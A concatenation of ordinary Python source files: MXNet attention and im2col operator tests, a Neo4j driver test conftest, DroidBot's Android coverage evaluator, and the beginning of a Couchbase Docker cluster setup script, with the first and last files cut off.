qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write', force_rebind=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output.simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write', force_rebind=True)
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@with_seed()
@assert_raises_cuda_not_satisfied(min_version='9.1')
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@with_seed()
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
@with_seed()
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@with_seed()
def test_broadcast_ops_on_misaligned_input():
dtypes = ['float16', 'float32', 'float64']
lead_dims = [2,3,4,6,10]
for dtype in dtypes:
for lead_dim in lead_dims:
for both_ways in [False, True]:
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@with_seed()
def test_broadcast_ops_on_misaligned_input_oneside():
dtypes = ['float16', 'float32', 'float64']
lead_dims = [2,3,4,6,10]
for dtype in dtypes:
for lead_dim in lead_dims:
for both_ways in [False, True]:
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000)
b = mx.nd.arange(5000)
e = mx.nd.arange(5000)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
if __name__ == '__main__':
import nose
nose.runmodule()
|
conftest.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright (c) 2002-2020 "Neo4j,"
# Neo4j Sweden AB [http://neo4j.com]
#
# This file is part of Neo4j.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import os
from threading import Thread
from time import sleep
from boltkit.server.stub import BoltStubService
from pytest import fixture
# import logging
# from neo4j.debug import watch
# watch("neo4j")
#
# log = logging.getLogger("neo4j")
class StubServer:
def __init__(self, port, script):
self.port = port
self.script = os.path.join(os.path.dirname(__file__), "scripts", script)
def run(self):
self._process = subprocess.Popen(["python", "-m", "boltkit", "stub", "-v", "-l", ":{}".format(str(self.port)), "-t", "10", self.script], stdout=subprocess.PIPE)
# Need verbose for this to work
line = self._process.stdout.readline()  # read one line of verbose output so we know the stub server is listening
def wait(self):
try:
returncode = self._process.wait(2)
if returncode != 0:
print("Stubserver failed with error")
return returncode == 0
except subprocess.TimeoutExpired:
print("Stubserver timeout!")
return False
def kill(self):
# Kill process if not already dead
if self._process.poll() is None:
self._process.kill()
class StubCluster:
def __init__(self, servers):
self.servers = {port: StubServer(port, script) for port, script in dict(servers).items()}
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_value, traceback):
self.wait()
def start(self):
for port, server in self.servers.items():
server.run()
def wait(self):
success = True
for port, server in self.servers.items():
if not server.wait():
success = False
server.kill()
if not success:
raise Exception("Stub server failed")
class LegacyStubServer(Thread):
def __init__(self, port, script):
super(LegacyStubServer, self).__init__()
self.port = port
self.script = os.path.join(os.path.dirname(__file__), "scripts", script)
def run(self):
check_call(["python", "-m", "boltkit.legacy.stub", "-v", str(self.port), self.script])
class LegacyStubCluster:
def __init__(self, servers):
self.servers = {port: LegacyStubServer(port, script) for port, script in dict(servers).items()}
def __enter__(self):
self.start()
def __exit__(self, exc_type, exc_value, traceback):
self.wait()
def start(self):
for port, server in self.servers.items():
server.start()
sleep(0.5)
def wait(self):
for port, server in self.servers.items():
server.join()
class DefaultBoltStubService(BoltStubService):
default_base_port = 9001
class StubCluster(StubCluster):
def __init__(self, *servers):
scripts = [os.path.join(os.path.dirname(__file__), "scripts", server) for server in servers]
bss = DefaultBoltStubService.load(*scripts)
servers2 = {port: script.filename for port, script in bss.scripts.items()}
super().__init__(servers2)
# def run():
# check_call(["bolt", "stub", "-v", "-t", "10", "-l", ":9001"] + scripts)
# self.thread = Thread(target=run)
# def __enter__(self):
# self.thread.start()
# sleep(0.5)
# def __exit__(self, exc_type, exc_value, traceback):
# self.thread.join(3)
@fixture
def script():
return lambda *paths: os.path.join(os.path.dirname(__file__), "scripts", *paths)
@fixture
def driver_info():
""" Base class for test cases that integrate with a server.
"""
return {
"uri_bolt": "bolt://localhost:9001",
"uri_neo4j": "neo4j://localhost:9001",
"user": "test",
"password": "test",
"auth_token": ("test", "test")
}
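# Illustrative sketch (not part of the original conftest): how the StubCluster
# defined above is typically combined with the driver_info fixture in a test.
# The script name "v3/return_1.script" is a hypothetical placeholder, and the
# driver calls assume the neo4j 1.7/4.x Python driver API. Left uncalled.
def _example_stub_cluster_usage(driver_info):
    from neo4j import GraphDatabase
    with StubCluster("v3/return_1.script"):
        with GraphDatabase.driver(driver_info["uri_bolt"], auth=driver_info["auth_token"]) as driver:
            with driver.session() as session:
                assert session.run("RETURN 1").single().value() == 1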
|
CoverageEvaluator.py
|
# Evaluate DroidBot with androcov
# basic idea is:
# A tool is better if it has higher coverage
import argparse
import os
import logging
import sys
import threading
import time
import subprocess
from datetime import datetime
from droidbot.droidbot import DroidBot
START_EMULATOR_CMD = "emulator -avd %s -port %d -wipe-data"
AVD_PORT = 5564
class CoverageEvaluator(object):
"""
evaluate a test tool with DroidBox
make sure you have started the droidbox emulator before evaluating
"""
MODE_DEFAULT = "1.default"
MODE_MONKEY = "2.monkey"
MODE_RANDOM = "3.random"
MODE_STATIC = "4.static"
MODE_DYNAMIC = "5.dynamic"
def __init__(self, start_emu_cmd, device_serial, apk_path,
event_duration, event_count, event_interval,
output_dir, androcov_path, android_jar_path):
self.modes = {
CoverageEvaluator.MODE_DEFAULT: self.default_mode,
CoverageEvaluator.MODE_MONKEY: self.adb_monkey,
# CoverageEvaluator.MODE_RANDOM: self.droidbot_random,
# CoverageEvaluator.MODE_STATIC: self.droidbot_static,
CoverageEvaluator.MODE_DYNAMIC: self.droidbot_dynamic
}
self.logger = logging.getLogger(self.__class__.__name__)
self.start_emu_cmd = start_emu_cmd
self.device_serial = device_serial
self.apk_path = os.path.abspath(apk_path)
self.output_dir = output_dir
self.androcov_path = androcov_path
self.android_jar_path = android_jar_path
if self.output_dir is None:
self.output_dir = "evaluation_reports/"
self.output_dir = os.path.abspath(self.output_dir)
if not os.path.exists(self.output_dir):
os.mkdir(self.output_dir)
self.temp_dir = os.path.join(self.output_dir, "temp")
if os.path.exists(self.temp_dir):
import shutil
shutil.rmtree(self.temp_dir)
os.mkdir(self.temp_dir)
self.androcov_output_dir = os.path.join(self.temp_dir, "androcov_out")
os.mkdir(self.androcov_output_dir)
self.output_dirs = {}
for mode in self.modes:
self.output_dirs[mode] = os.path.join(self.output_dir, mode)
self.androcov = self.androcov_instrument()
self.apk_path = self.androcov.apk_path
now = datetime.now()
self.report_title = now.strftime("Evaluation_Report_%Y-%m-%d_%H%M")
result_file_name = self.report_title + ".md"
self.result_file_path = os.path.join(self.output_dir, result_file_name)
self.event_duration = event_duration
if self.event_duration is None:
self.event_duration = 200
self.event_count = event_count
if self.event_count is None:
self.event_count = 200
self.event_interval = event_interval
if self.event_interval is None:
self.event_interval = 2
self.record_interval = self.event_duration / 20
if self.record_interval < 2:
self.record_interval = 2
self.emulator = None
self.droidbot = None
self.result = {}
self.logger.info("Evaluator initialized")
self.logger.info("apk_path:%s\n"
"duration:%d\ncount:%d\ninteval:%d\nreport title:%s" %
(self.apk_path, self.event_duration,
self.event_count, self.event_interval, self.report_title))
self.enabled = True
def start_evaluate(self):
"""
start droidbox testing
:return:
"""
if not self.enabled:
return
for mode in self.modes:
self.evaluate_mode(mode, self.modes[mode])
self.dump_result(sys.stdout)
result_file = open(self.result_file_path, "w")
self.dump_result(result_file)
result_file.close()
def androcov_instrument(self):
"""
instrument the app with androcov
@return:
"""
subprocess.check_call(["java", "-jar", self.androcov_path,
"-i", self.apk_path, "-o", self.androcov_output_dir,
"-sdk", self.android_jar_path])
import androcov_report
return androcov_report.Androcov(androcov_dir=self.androcov_output_dir)
def evaluate_mode(self, mode, target):
"""
evaluate a particular mode
:param mode: str of mode
:param target: the target function to run
:return:
"""
if not self.enabled:
return
self.logger.info("evaluating [%s] mode" % mode)
self.start_emulator()
target_thread = threading.Thread(target=target)
target_thread.start()
self.monitor_and_record(mode)
self.stop_modules()
self.stop_emulator()
self.logger.info("finished evaluating [%s] mode" % mode)
def start_emulator(self):
self.emulator = subprocess.Popen(self.start_emu_cmd.split(),
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
self.wait_for_device()
def stop_modules(self):
if self.droidbot is not None:
self.droidbot.stop()
time.sleep(5)
def stop_emulator(self):
if not self.emulator:
return
self.emulator.terminate()
time.sleep(5)
def wait_for_device(self):
"""
wait until the device is fully booted
:return:
"""
try:
subprocess.check_call(["adb", "-s", self.device_serial, "wait-for-device"])
while True:
out = subprocess.check_output(["adb", "-s", self.device_serial, "shell",
"getprop", "init.svc.bootanim"]).split()[0]
if out == "stopped":
break
time.sleep(3)
except:
self.logger.warning("error waiting for device")
def monitor_and_record(self, mode):
if not self.enabled:
return
self.result[mode] = {}
self.logger.info("start monitoring")
try:
time.sleep(self.event_duration)
except KeyboardInterrupt:
self.stop()
mode_logcat_path = os.path.join(self.output_dirs[mode], "logcat.log")
self.result[mode] = self.androcov.gen_androcov_report(mode_logcat_path)
self.logger.info("stop monitoring")
self.logger.debug(self.result)
def stop(self):
self.enabled = False
def start_droidbot(self, env_policy, event_policy, output_dir):
"""
start droidbot with given arguments
:param env_policy: policy to deploy environment
:param event_policy: policy to send events
:param output_dir: droidbot output directory
:return:
"""
if not self.enabled:
return
self.logger.info("starting droidbot")
self.droidbot = DroidBot(device_serial=self.device_serial,
app_path=self.apk_path,
env_policy=env_policy,
event_policy=event_policy,
event_count=self.event_count,
event_duration=self.event_duration,
event_interval=self.event_interval,
output_dir=output_dir,
quiet=True)
self.droidbot.start()
def default_mode(self):
self.start_droidbot(env_policy="none",
event_policy="none",
output_dir=self.output_dirs[CoverageEvaluator.MODE_DEFAULT])
def adb_monkey(self):
"""
try droidbot "monkey" mode
:return:
"""
self.start_droidbot(env_policy="none",
event_policy="monkey",
output_dir=self.output_dirs[CoverageEvaluator.MODE_MONKEY])
def droidbot_random(self):
"""
try droidbot "random" mode
:return:
"""
self.start_droidbot(env_policy="none",
event_policy="random",
output_dir=self.output_dirs[CoverageEvaluator.MODE_RANDOM])
def droidbot_static(self):
"""
try droidbot "static" mode
:return:
"""
self.start_droidbot(env_policy="none",
event_policy="static",
output_dir=self.output_dirs[CoverageEvaluator.MODE_STATIC])
def droidbot_dynamic(self):
"""
try droidbot "dynamic" mode
:return:
"""
self.start_droidbot(env_policy="none",
event_policy="dynamic",
output_dir=self.output_dirs[CoverageEvaluator.MODE_DYNAMIC])
def result_safe_get(self, mode_tag=None, item_key=None, timestamp=None):
"""
get an item from result
"""
if mode_tag is None:
return self.result
if mode_tag in self.result:
result_mode = self.result[mode_tag]
if item_key is None:
return result_mode
if isinstance(result_mode, dict) and item_key in result_mode:
result_item = result_mode[item_key]
if timestamp is None:
return result_item
if isinstance(result_item, dict) and timestamp in result_item:
return result_item[timestamp]
return None
def dump_result(self, out_file):
modes = self.result_safe_get()
if modes is None or not modes:
return
else:
modes = list(modes.keys())
modes.sort()
out_file.write("# %s\n\n" % self.report_title)
out_file.write("## About\n\n")
out_file.write("This report is generated automatically by %s "
"with options:\n\n"
"+ apk_path=%s\n"
"+ event_duration=%s\n"
"+ event_interval=%s\n"
"+ event_count=%s\n\n"
% (self.__class__.__name__, os.path.basename(self.apk_path),
self.event_duration, self.event_interval, self.event_count))
out_file.write("## Apk Info\n\n")
out_file.write("|Item|Value|\n")
out_file.write("|----|----|\n")
out_file.write("|Package Name|%s|\n" % self.droidbot.app.get_package_name())
out_file.write("|Main Activity|%s|\n" % self.droidbot.app.get_main_activity())
apk_hashes = self.droidbot.app.get_hashes()
out_file.write("|Hash (md5)|%s|\n" % apk_hashes[0])
out_file.write("|Hash (sha1)|%s|\n" % apk_hashes[1])
out_file.write("|Hash (sha256)|%s|\n\n" % apk_hashes[2])
out_file.write("### Permissions\n\n")
permissions = self.droidbot.app.get_androguard_analysis().a.get_permissions()
for permission in permissions:
out_file.write("+ %s\n" % permission)
out_file.write("\n## Data\n\n")
out_file.write("### Summary\n\n")
# gen head lines
th1 = "|\titem\t|"
th2 = "|----|"
for mode in modes:
th1 += "\t%s\t|" % mode
th2 += "----|"
th1 += "\n"
th2 += "\n"
out_file.write(th1)
out_file.write(th2)
# gen content
item_keys = self.result_safe_get(modes[0])
if item_keys is None:
item_keys = []
else:
item_keys = item_keys.keys()
for item_key in item_keys:
item_sample_value = self.result_safe_get(modes[0], item_key)
if item_sample_value is None:
continue
if not isinstance(item_sample_value, str)\
and not isinstance(item_sample_value, int)\
and not isinstance(item_sample_value, float):
continue
tl = "|\t%s\t|" % item_key
for mode in modes:
item_value = self.result_safe_get(mode, item_key)
tl += "\t%s\t|" % item_value
tl += "\n"
out_file.write(tl)
out_file.write("\n### Tendency\n\n")
# gen head lines
th1 = "|\ttime\t|"
th2 = "|----|"
for mode in modes:
th1 += "\t%s\t|" % mode
th2 += "----|"
th1 += "\n"
th2 += "\n"
out_file.write(th1)
out_file.write(th2)
# gen content
timestamps = []
for mode in modes:
mode_timestamps = self.result_safe_get(mode, "timestamp_count")
if not isinstance(mode_timestamps, dict):
continue
timestamps.extend(mode_timestamps)
timestamps = sorted(set(timestamps))
reached_method_count_in_last_timestamp = {}
for mode in modes:
reached_method_count_in_last_timestamp[mode] = 0
for timestamp in timestamps:
tl = "|\t%d\t|" % timestamp
for mode in modes:
# all_methods_count = self.result_safe_get(mode, "all_methods_count")
reached_method_count = self.result_safe_get(mode, "timestamp_count", timestamp)
if isinstance(reached_method_count, int):
reached_method_count_in_last_timestamp[mode] = reached_method_count
else:
reached_method_count = reached_method_count_in_last_timestamp[mode]
tl += "\t%s\t|" % reached_method_count
tl += "\n"
out_file.write(tl)
out_file.flush()
def parse_args():
"""
parse command line input
generate options including avd name, apk path, event settings and output paths
"""
description = "Run different testing bots on droidbox, and compare their log counts."
parser = argparse.ArgumentParser(description=description,
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("-avd", action="store", dest="avd_name", required=True,
help="avd name of target emulator")
parser.add_argument("-a", action="store", dest="apk_path", required=True,
help="file path of target app, necessary for static analysis")
parser.add_argument("-count", action="store", dest="event_count",
type=int, help="number of events to generate during testing")
parser.add_argument("-interval", action="store", dest="event_interval",
type=int, help="interval between two events (seconds)")
parser.add_argument("-duration", action="store", dest="event_duration",
type=int, help="duration of droidbot running (seconds)")
parser.add_argument("-o", action="store", dest="output_dir",
help="directory of output")
parser.add_argument("-androcov", action="store", dest="androcov_path", required=True,
help="path to androcov.jar")
parser.add_argument("-sdk", action="store", dest="android_jar_path", required=True,
help="path to Sdk/platforms/android-XX/android.jar")
options = parser.parse_args()
# print options
return options
if __name__ == "__main__":
opts = parse_args()
logging.basicConfig(level=logging.INFO)
device_serial = "emulator-%d" % AVD_PORT
start_emu_cmd = START_EMULATOR_CMD % (opts.avd_name, AVD_PORT)
evaluator = CoverageEvaluator(
start_emu_cmd=start_emu_cmd,
device_serial=device_serial,
apk_path=opts.apk_path,
event_duration=opts.event_duration,
event_count=opts.event_count,
event_interval=opts.event_interval,
output_dir=opts.output_dir,
androcov_path=opts.androcov_path,
android_jar_path=opts.android_jar_path
)
try:
evaluator.start_evaluate()
except KeyboardInterrupt:
evaluator.stop()
evaluator.dump_result(sys.stdout)
|
create_cb_containers.py
|
#!/usr/bin/env python
import os, sys, argparse, json, subprocess, paramiko, requests, time, threading
from scp import SCPClient
spark_worker_container='spark_worker'
spark_master_container='spark_master'
couchbase_container='couchbase_base'
couchbase_ips = []
spark_worker_ips = []
spark_master_ips = []
container_prefix = "dockercb"
cluster_config_file = "config.json"
buckets = ['default']
masterIp = None
masterClient = None
def run_command(args):
p = subprocess.Popen(args)
p.wait()
if p.returncode != 0:
print('command failed with exit status {0}'.format(p.returncode))
os._exit(1)
def get_ips_and_configure(cb_nodes, prefix, download_url, descfile):
for i in range(1, int(cb_nodes) + 1):
container_id = "{0}_{1}_{2}".format(prefix, couchbase_container, i)
args = ["docker", "inspect", "--format='{{.NetworkSettings.IPAddress}}'", container_id]
print('the args are', args)
process = subprocess.Popen(args, stdout=subprocess.PIPE)
out, err = process.communicate()
print('out is', out)
print('err is', err)
if out.rstrip() == '':
print('failed to get an IP')
return
else:
couchbase_ips.append(out.rstrip())
print('the ips are', couchbase_ips)
with open(descfile, "w+") as f:
json.dump( couchbase_ips, f)
tasks = []
lock = threading.Lock()
for i in range(0, int(cb_nodes)):
isMaster = False
if i == 0:
isMaster = True
task = threading.Thread(target=install_couchbase, args=(couchbase_ips[i], download_url, isMaster))
task.start()
tasks.append(task)
[task.join() for task in tasks]
time.sleep(20) #install should not take longer than this - use a better way
for i in range(0, int(cb_nodes)):
print('requesting from', "http://{0}:8091/pools".format(couchbase_ips[i]))
r = requests.get("http://{0}:8091/pools".format(couchbase_ips[i]))
if r.status_code != 200:
print("Server not installed correctly. Received status code:".format(r.status_code))
os._exit(1)
#initialize_nodes_rebalance(couchbase_ips)
def install_couchbase(ip, url, isMaster):
client = paramiko.SSHClient()
client.load_system_host_keys()
